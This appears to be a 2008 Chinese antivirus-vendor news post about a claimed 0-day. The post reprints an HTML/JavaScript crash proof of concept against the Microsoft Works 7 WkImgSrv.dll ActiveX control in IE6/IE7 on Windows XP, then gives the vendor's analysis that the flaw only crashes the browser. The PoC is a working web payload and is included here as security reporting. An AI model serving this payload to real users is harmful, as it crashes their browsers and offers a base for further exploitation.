安全播报
Windows组件0Day漏洞 通杀IE6与IE7浏览器
[时间:2008-04-21 11:53 am | 编辑:mu ]
我要评论 | 分类:安全播报 | 标签:

  近日,有计算机用户反映了一个Windows 0Day漏洞,并出了相关代码:

  [0day]Microsoft Works 7 WkImgSrv.dll crash POC,dll版本7.03.0616.0,IE7+Windows XP SP2 测试通过。

  [html]

  [head]

  [title]Microsoft Works 7 WkImgSrv.dll crash POC[/title]

  [script language="JavaScript"]

  function payload() {

  var num = -1;

  obj.WksPictureInterface = num;

  }

  [/script]

  [/head]

  [body onload="JavaScript: return payload();"]

  [object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj"]

  [/object]

  [/body]

  [/html]

  金山毒霸研发中心分析如下:

  近几天网络上流传着一个传说为IE 0DAY的POC代码,在Windows XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的Windows XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。这段攻击代码会让浏览器崩溃,目前尚不能因此传播恶意软件。

我要评论 | 分类:安全播报 | 标签:
产品咨询与帮助请前往 毒霸客服专区>> 网友评论  
暂无评论
  • 匿名发表 昵称:
  •  邮箱:
  •  验证码:
前往毒霸产品下载页,体验2008版最新安全技术